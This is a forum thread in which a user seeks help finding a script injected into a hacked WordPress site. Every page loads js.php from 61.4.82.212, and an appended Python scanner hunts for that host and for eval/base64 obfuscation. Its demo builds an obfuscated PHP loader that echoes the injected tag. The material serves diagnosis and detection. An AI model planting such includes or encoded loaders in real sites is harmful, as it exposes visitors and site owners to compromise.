
Website Hacked: 61.4.82.212 Script Added


jsarber


My friend, The Lonely Conservative (lonelyconservative.com), had her site hacked. I am struggling to find the problem code within her WordPress site. Here's what's going on. This script has been added to the bottom of each page:

 

<script src="http://61.4.82.212/js.php"></script>

 

As you would expect, this script is not within the actual files. I assume I am looking for some kind of encoded something or other. How in the world do I go about finding it? I've been searching for more than a day.


Just double checking... you've checked the bottom of your index.php file? (in the root of your site -- not within your theme folder) And the footer.php file within your theme folder? It looks like it's included on every page, so those are the two logical places it would be.

 

It won't necessarily be encoded -- this has happened to me in the past and it was just plain text.


Here's the root index file:

 

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

 

Here's the theme's footer:

 

<?php global $wp_theme_options; ?>
<?php do_action('above_footer') ?>

</div><!--end #container-->

<div class="<?php do_action('container_style'); ?>" id="footer">
<div class="alignleft">
<strong><?php bloginfo('name'); ?></strong><br />
<?php _e('Copyright ©','flexx'); echo ' '.date('Y').' '; _e('All Rights Reserved','flexx'); ?>
</div>
<div class="alignright">
	<?php	
	$footer_credit = '<a href="http://flexxtheme.com/" title="Flexx Theme">'.__('Flexx Theme','flexx').'</a> '.__('by','flexx').' <a href="http://ithemes.com" title="WordPress Themes">iThemes</a><br />';
	$footer_credit .= __('Powered by','flexx').' <a href="http://wordpress.org">'.__('WordPress','flexx').'</a>';
	echo apply_filters('ithemes_footer_credit',$footer_credit);
	?>
</div>

<?php wp_footer(); //We need this for plugins ?>
</div>

<?php do_action('flexx_footer_stats'); ?>
</body>
</html>

 

I don't see anything, do you? I've searched the entire site for that script and every part of it. My search was fruitless which made me think it must be encoded. I also searched the database and came up short. I don't know what to do.

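One way to hunt for the include when a plain-text search of the files comes up empty, as in the thread above. This is an added example, not code from any poster: it walks a site tree, decodes quoted base64 literals (and any deflate-compressed layer under them) and reports files where the 61.4.82.212 host appears only after decoding, plus files that chain eval with decoder functions. The sample tree it scans, including the file name cache.php, is constructed for the demonstration.

```python
import base64, binascii, re, tempfile, zlib
from pathlib import Path

INDICATOR = b"61.4.82.212"  # host in the injected <script> tag quoted in the thread
B64_LITERAL = re.compile(rb"""["']([A-Za-z0-9+/=]{24,})["']""")  # long quoted base64 run
DECODERS = re.compile(rb"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")

def decoded_layers(literal):
    """Yield the base64-decoded bytes and, if they inflate, the inflated bytes."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return
    yield raw
    for wbits in (-15, 15):  # PHP gzinflate = raw deflate, gzuncompress = zlib
        try:
            yield zlib.decompress(raw, wbits)
        except zlib.error:
            pass

def scan_file(path):
    data = path.read_bytes()
    findings = []
    if INDICATOR in data:
        findings.append("indicator in plain text")
    for m in B64_LITERAL.finditer(data):
        if any(INDICATOR in layer for layer in decoded_layers(m.group(1))):
            findings.append(f"indicator inside encoded literal at byte {m.start(1)}")
    calls = sorted({c.decode() for c in DECODERS.findall(data)})
    if "eval" in calls and len(calls) > 1:
        findings.append("eval chained with decoder: " + ", ".join(calls))
    return findings

def scan_tree(root):
    """Map relative path -> findings for every file under root that has any."""
    hits = {p.relative_to(root).as_posix(): scan_file(p) for p in Path(root).rglob("*") if p.is_file()}
    return {name: f for name, f in hits.items() if f}

def demo():
    """Scan a constructed two-file tree: one clean file, one with an encoded include."""
    tag = b"echo '<script src=\"http://61.4.82.212/js.php\"></script>';"
    deflater = zlib.compressobj(wbits=-15)
    blob = base64.b64encode(deflater.compress(tag) + deflater.flush())
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "index.php").write_bytes(b"<?php require('./wp-blog-header.php'); ?>")
        Path(tmp, "cache.php").write_bytes(b"<?php eval(gzinflate(base64_decode('" + blob + b"'))); ?>")
        return scan_tree(tmp)

if __name__ == "__main__": print(demo())
```

To check a real site, call scan_tree() on a local copy of the document root; it reads files only, so a database export has to be scanned separately.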
